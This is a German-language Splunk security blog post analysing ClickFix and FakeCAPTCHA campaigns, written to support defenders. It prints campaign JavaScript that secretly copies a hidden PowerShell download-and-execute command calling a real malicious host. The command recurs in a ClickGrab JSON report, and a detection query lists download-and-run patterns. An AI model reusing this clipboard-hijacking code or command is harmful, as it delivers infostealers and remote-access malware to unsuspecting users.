Social-Engineering-Angriffe gehören nach wie vor zu den effektivsten Methoden, Malware zu verbreiten und Systeme zu kompromittieren. Bei dieser Art von Angriffen gibt es einen neuen, besorgniserregenden Trend, der schnell um sich greift: so genannte „ClickFix“- und „FakeCAPTCHA“-Kampagnen. Diese raffinierten Angriffe nutzen die Vertrautheit der Benutzer mit alltäglichen Verifikationssystemen aus und setzen Techniken zur Manipulation der Zwischenablage ein, um böswillige Nutzlasten zu verteilen – und sind dafür auf keine einzige technische Schwachstelle angewiesen.
Diese Kampagnen wurden erstmals Anfang 2024 beobachtet und haben 2025 dramatisch zugenommen. Dabei haben sie sich diese von einfachen kriminellen Operationen zu ausgefeilten Angriffstechniken entwickelt, die mittlerweile auch von nationalstaatlichen Akteuren eingesetzt werden. Was diese Angriffe besonders besorgniserregend macht, ist die Tatsache, dass sie sehr effektiv sind, obwohl sie ja doch eine erhebliche Interaktion seitens der Benutzer erfordern. Wenn die Mechanismen hinter diesen Kampagnen klar sind, können Sicherheitsteams Strategien entwickeln, um sie zu erkennen und zu verhindern, bevor sie Systeme kompromittieren.
In diesem Blog sehen wir uns den Aufbau von ClickFix- und FakeCAPTCHA-Kampagnen genauer an, untersuchen konkrete Codebeispiele aus der Praxis, verfolgen ihre Entwicklung und bieten praktische Verteidigungsstrategien. Außerdem stellen wir ein spezielles Tool namens „ClickGrab“ vor, das dem Abwehrteam hilft, diese Bedrohungen zu analysieren und verwertbare Informationen zu gewinnen, um ihre Sicherheitslage gegen diese betrügerischen Kampagnen zu stärken. Darüber hinaus behandeln wir eine Methode, mit der sich mit „PasteEater“ Elemente abfangen lassen, die in die Windows-Zwischenablage kopiert wurden.
Im Kern gehören diese Angriffe zur hohen Schule des Social-Engineering. Im Gegensatz zu herkömmlichen Malware-Verbreitungsmechanismen, die Schwachstellen von Software ausnutzen, setzen ClickFix- und FakeCAPTCHA-Kampagnen vollständig auf die Manipulation des Benutzerverhaltens.
Was diese Angriffe so außerordentlich effektiv macht, ist ihre psychologische Manipulation:

(FakeCAPTCHA-Beispiel, Splunk 2025)

(FakeCAPTCHA „Verify you are a human“, Splunk 2025)
Sehen wir uns ein konkretes Code-Snippet aus einer FakeCAPTCHA-Kampagne an, die wir analysiert haben:
function stageClipboard(commandToRun, verification_id) {
const suffix = " # "
const ploy = "✅ ''I am not a robot - reCAPTCHA Verification Hash: "
const end = "''"
const textToCopy = commandToRun + suffix + ploy + verification_id + end
setClipboardCopyData(textToCopy);
}
// Later in the code:
const htaPath = "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\"";
const commandToRun = "powershell " + htaPath;
stageClipboard(commandToRun, verification_id);
Diese Codestruktur zeigt, wie hinterlistig diese Angriffe sind. Klickt ein Benutzer auf die Verifizierungsschaltfläche, wird die Funktion stageClipboard ausgeführt. Diese schreibt einen PowerShell-Befehl in die Zwischenablage, auf den eine scheinbar legitime Verifizierungsmeldung folgt.
Der eigentliche Befehlsteil (powershell -w hidden -c "iwr 'https://example.com/malicious.ps1' | iex") bewirkt Folgendes:
Wenn die Opfer dies in ihre Befehlszeile oder ihr Dialogfeld „Ausführen“ einfügen, sehen sie nur den harmlos aussehenden Teil: ✅ ''I am not a robot - reCAPTCHA Verification Hash: 328459'', während der schädliche Befehl stillschweigend im Hintergrund ausgeführt wird.
Durch umfangreiche Analysen von ClickFix- und FakeCAPTCHA-Kampagnen mit unserem ClickGrab-Tool haben wir einheitliche Muster identifiziert, die den Aufbau dieser Angriffe offenlegen. Diese Gemeinsamkeiten helfen bei der Abwehr nicht nur, bösartige Websites zu erkennen, sondern liefern auch wertvolle Einblicke in die operativen Methoden der Bedrohungsakteure, die dahinter stecken.
Unsere Analyse der jüngsten Kampagnen zeigt wiederholte Verweise auf bestimmte Domänen, die helfen, den Anschein von Legitimität zu erwecken:
| Domäne | Zweck beim Angriff |
|---|---|
| www.google.com | Wird hauptsächlich verwendet, um legitime Google reCAPTCHA-Ressourcen zu referenzieren |
| use.fontawesome.com | Wird zum Laden legitimer Icon-Fonts verwendet, um die optische Glaubwürdigkeit zu verbessern |
| cdnjs.cloudflare.com | Stellt Frontend-Frameworks bereit, die gefälschte Schnittstellen professionell erscheinen lassen |
Diese legitimen Ressourcen werden absichtlich mit bösartigen Komponenten gemischt, um eine überzeugende Benutzererfahrung zu schaffen.
Fast alle FakeCAPTCHA-Kampagnen weisen gemeinsame visuelle Schlüsselelemente auf:
Die HTML-Struktur dieser gefälschten Verifizierungssysteme folgt überraschend einheitlichen Mustern:
html
<div class="recaptcha-box">
<h2>Verify You Are Human</h2>
<p>Please verify that you are a human to continue.</p>
<div class="container m-p">
<div id="checkbox-window" class="checkbox-window m-p block">
<div class="checkbox-container m-p">
<button type="button" id="checkbox" class="checkbox m-p line-normal"></button>
</div>
Diese Struktur ist bewusst so konzipiert, dass sie legitime CAPTCHA-Implementierungen nachahmt, während sie die bösartigen JavaScript-Operationen verbirgt, die bei der Benutzerinteraktion mit den Elementen ausgeführt werden.
Der Kern des Angriffs liegt im JavaScript-Code, der die Zwischenablage manipuliert. Unsere Analyse zeigt, dass die meisten böswilligen Kampagnen die Funktion document.execCommand("copy") verwenden, um die Zwischenablage der Benutzer zu kapern. Diese JavaScript-Funktion erfordert nur minimale Berechtigungen, eröffnet jedoch beträchtliche Angriffsmöglichkeiten.
Ein wiederkehrendes Muster ist die Verwendung temporärer textarea-Elemente für das Staging schädlicher Inhalte, bevor sie in die Zwischenablage kopiert werden:
Das vielleicht auffälligste Merkmal dieser Kampagnen ist die wiederkehrende stageClipboard-Funktion, die wir in zwölf verschiedenen Kampagnen mit bemerkenswert ähnlichen Implementierungen gefunden haben:
javascript
function stageClipboard(commandToRun, verification_id) {
const suffix = " # ";
const ploy = "✅ ''I am not a robot - reCAPTCHA Verification Hash: ";
const end = "''";
const textToCopy = commandToRun + suffix + ploy + verification_id + end;
setClipboardCopyData(textToCopy);
}
Diese Funktion kombiniert den böswilligen Befehl mit harmlos wirkendem Verifizierungstext, sodass die Opfer nur die Verifizierungsnachricht bemerken, wenn sie den Inhalt der Zwischenablage einfügen.
Auch die bösartigen PowerShell-Befehle folgen bestimmten Mustern:
So sieht eine typische Befehlsstruktur aus:
powershell
powershell -w hidden -c "iwr 'https://[malicious-domain]/[path].ps1' | iex"
Das Clipboard-Hijacking zu Anfang ist nur der erste Schritt. Wenn sie einmal ausgeführt wurden, verteilen diese Angriffe üblicherweise verschiedene Arten von Malware:
Bei den Nutzlasten handelt es sich häufig um Datendiebstahl-Malware (Infostealer), die sensible Browserdaten wie den Browserverlauf, gespeicherte Passwörter, Cookies und Autofill-Informationen abgreift. Diese Schadprogramme zielen auf bestimmte Verzeichnisse ab, in denen Browser Benutzerdaten speichern, greifen auf Dateien zu und entschlüsseln sie, um sich unbefugten Zugriff auf persönliche Informationen und Anmeldedaten zu verschaffen.
Gängige Infostealer-Programme sind:
RATs wie NetSupport geben Angreifern dauerhaft Zugriff auf kompromittierte Systeme und ermöglichen dadurch kontinuierliche Überwachung, Datendiebstahl und Lateral Movement innerhalb von Netzwerken.
Zu den gängigen RATs, die durch diese Kampagnen verteilt werden, gehören:
Bei vielen Kampagnen werden so genannte „Dropper“ verteilt, die dann mehrere Malware-Familien auf einem einzigen System installieren:
Bei einigen Kampagnen wurde beobachtet, dass nach einer einzigen Erstinfektion bis zu fünf verschiedene Malware-Familien verteilt wurden.
Um Sicherheitsteams dabei zu unterstützen, diesen sich ständig weiterentwickelnden Bedrohungen einen Schritt voraus zu sein, haben wir ClickGrab entwickelt, ein umfassendes Analysetool, das speziell darauf ausgelegt ist, ClickFix- und FakeCAPTCHA-Kampagnen zu erkennen, zu analysieren und zu verstehen.

(Website mit ClickGrab-Analyse https://mhaggis.github.io/ClickGrab/, Splunk 2025)
ClickGrab ist ein leistungsstarkes, auf Python und PowerShell basierendes Tool, das Sicherheitsforschern und -experten hilft, bösartige Websites zu identifizieren und zu analysieren, die gefälschte CAPTCHA-Verifizierungssysteme für Social-Engineering-Angriffe einsetzen. Es schließt die Lücke zwischen Bedrohungsinformationen und praktischer Abwehr durch folgende Funktionen:
Das Tool arbeitet in zwei Hauptmodi:
Dieser Modus ermöglicht Sicherheitsforschern, sicher mit verdächtigen Websites zu interagieren und gleichzeitig Aktivitäten in der Zwischenablage zu überwachen:
Dieser nicht-interaktive Modus führt Massenanalysen durch, ohne dass dazu Browser-Interaktionen erforderlich sind:
ClickGrab beinhaltet ausgefeilte Erkennungstechniken, um selbst gut versteckte Bedrohungen aufzuspüren:
Sicherheitsteams können über mehrere Schnittstellen auf die ClickGrab-Funktionen zugreifen:
# Run in analysis mode, looking for FakeCAPTCHA campaigns .\clickgrab.ps1 -Analyze -Tags "FakeCaptcha,ClickFix" # Limit analysis to 5 URLs and include older campaigns .\clickgrab.ps1 -Analyze -Limit 5 -IgnoreDateCheck # Filter for specific tags with debug output .\clickgrab.ps1 -Analyze -Tags "FakeCaptcha" -Debug
Wenn ClickGrab eine verdächtige URL analysiert, generiert es einen umfassenden Bericht wie diesen:
{
"URL": "https://jessespridecharters.com/v/",
"RawHTML": "...",
"Base64Strings": [],
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://yogasitesdev.wpengine.com/2/15.ps1"
],
"PowerShellCommands": [
"powershell -w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""
],
"IPAddresses": [],
"ClipboardCommands": [
"powershell -w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\" # ✅ ''I am not a robot - reCAPTCHA Verification Hash: 328459''"
],
"SuspiciousKeywords": [
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification"
],
"ClipboardManipulation": [
"document.execCommand(\"copy\")",
"navigator.clipboard.writeText"
],
"PowerShellDownloads": [
{
"FullMatch": "iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex",
"URL": "https://yogasitesdev.wpengine.com/2/15.ps1",
"Context": "User clipboard hijacking"
}
],
"MSHTACommands": []
}
Mithilfe dieser detaillierten Berichte können Sicherheitsteams:

(PasteEater, Splunk 2025)
Es ist extrem wichtig, diese Bedrohungen zu verstehen, doch das Verteidigungsteam benötigt auch praktische Tools zum Schutz der Benutzer. Für diese Herausforderung hat Will Metcalf „PasteEater“ entwickelt: Dies ist eine spezialisierte Windows-Anwendung, die den Inhalt der Zwischenablage aus Browserprozessen abfängt und analysiert, bevor Benutzer potenziell schädliche Befehle ausführen können.
PasteEater fungiert als Schutzschicht zwischen browserbasierten Vorgängen in der Zwischenablage und dem Zwischenablagensystem von Windows. Das funktioniert so:
PasteEater ist aus folgenden Gründen besonders effektiv gegen FakeCAPTCHA- und ClickFix-Angriffe:
Da die Präventionsbereitschaft bei jeder Organisation unterschiedlich hoch ist, teilen wir die folgende Liste mit Ideen und hoffen, dass eine davon hilft, eure Angriffsfläche zu verringern.
Um Sicherheitsteams bei der Abwehr dieser betrügerischen Kampagnen zu unterstützen, haben wir umfassende Erkennungsinhalte für Splunk entwickelt. Bei unserem Ansatz liegt der Fokus darauf, die charakteristischen Muster und Verhaltensweisen zu identifizieren, die bei FakeCAPTCHA-Angriffen auftreten. Wir haben eine Analytic Story entwickelt, um Unternehmen zu helfen, Inhalte zu diesen Angriffen schnell bereitzustellen.
Diese Erkennung identifiziert potenzielle FakeCAPTCHA/ClickFix-Kampagnen vom Typ „Clipboard-Hijacking“, indem sie nach der Ausführung von PowerShell-Befehlen mit Parametern für versteckte Fenster und charakteristischen Zeichenfolgen sucht, die mit der gefälschten CAPTCHA-Verifizierung in Zusammenhang stehen. Diese Kampagnen nutzen Social Engineering, um Benutzer zu verleiten, bösartige PowerShell-Befehle aus ihrer Zwischenablage einzufügen, wodurch in der Regel Infostealer oder Remote Access-Trojaner eingeschleust werden.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes where `process_powershell` AND ( (Processes.process IN ("* -w hidden *", "* -window hidden *", "* -windowstyle hidden *", "*-w h*", "*-wind h*", "*-windowstyle h*") OR Processes.process="*-w h*") AND ( (Processes.process IN ("*robot*", "*captcha-iogo*", "*Robot*", "*captcha-logo*", "*Captcha*", "*captcha-container*", "*captcha*", "*captcha-box*", "*CAPTCHA*", "*CaptchaListeners*")) OR ( (Processes.process IN ("*iwr *", "*Invoke-WebRequest*", "*wget *", "*curl *", "*Net.WebClient*", "*DownloadString*", "*[Convert]::FromBase64String*")) AND (Processes.process IN ("*|iex*", "*|Invoke-Expression*", "* iex *", "* Invoke-Expression *")) ) OR (Processes.process="*FromBase64String*" AND Processes.process="*iex*") ) ) by Processes.action Processes.dest Processes.original_file_name Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`
|

(Von Splunk Query erkanntes FakeCAPTCHA, Splunk 2025)
ClickFix- und FakeCAPTCHA-Kampagnen stellen eine ausgeklügelte Weiterentwicklung von Social-Engineering-Angriffen dar, bei denen technische Täuschung mit menschlicher Psychologie kombiniert wird. Vielleicht erscheinen sie im Vergleich zu komplexen Exploit-Ketten simpel, doch ihre Wirksamkeit liegt darin, dass sie die verwundbarste Komponente jedes Sicherheitssystems ausnutzen: das menschliche Vertrauen.
Durch den Einsatz von Tools wie ClickGrab, PasteEater und anderen nativen Windows-Funktionen können Verteidiger wertvolle Einblicke in diese Bedrohungen gewinnen, Kompromittierungsindikatoren extrahieren und wirksame Gegenmaßnahmen entwickeln. Während wir unsere Abwehrmaßnahmen weiterentwickeln, bleibt der Austausch von Informationen über diese Bedrohungen eines unserer mächtigsten Instrumente.
Bleibt wachsam und denkt daran: Ein legitimes Verifizierungssystem wird niemals dazu auffordern, Befehle zu kopieren und einzufügen oder eine Eingabeaufforderung zu öffnen.
Die führenden Unternehmen der Welt vertrauen auf Splunk, einem Unternehmen von Cisco, um ihre digitale Resilienz mit der einheitlichen Sicherheits- und Observability-Plattform, unterstützt durch branchenführende KI, kontinuierlich zu stärken.
Unsere Kunden setzen auf die preisgekrönten Sicherheits- und Observability-Lösungen von Splunk, um die Zuverlässigkeit ihrer komplexen digitalen Umgebungen zu sichern und zu optimieren – in jeder Größenordnung.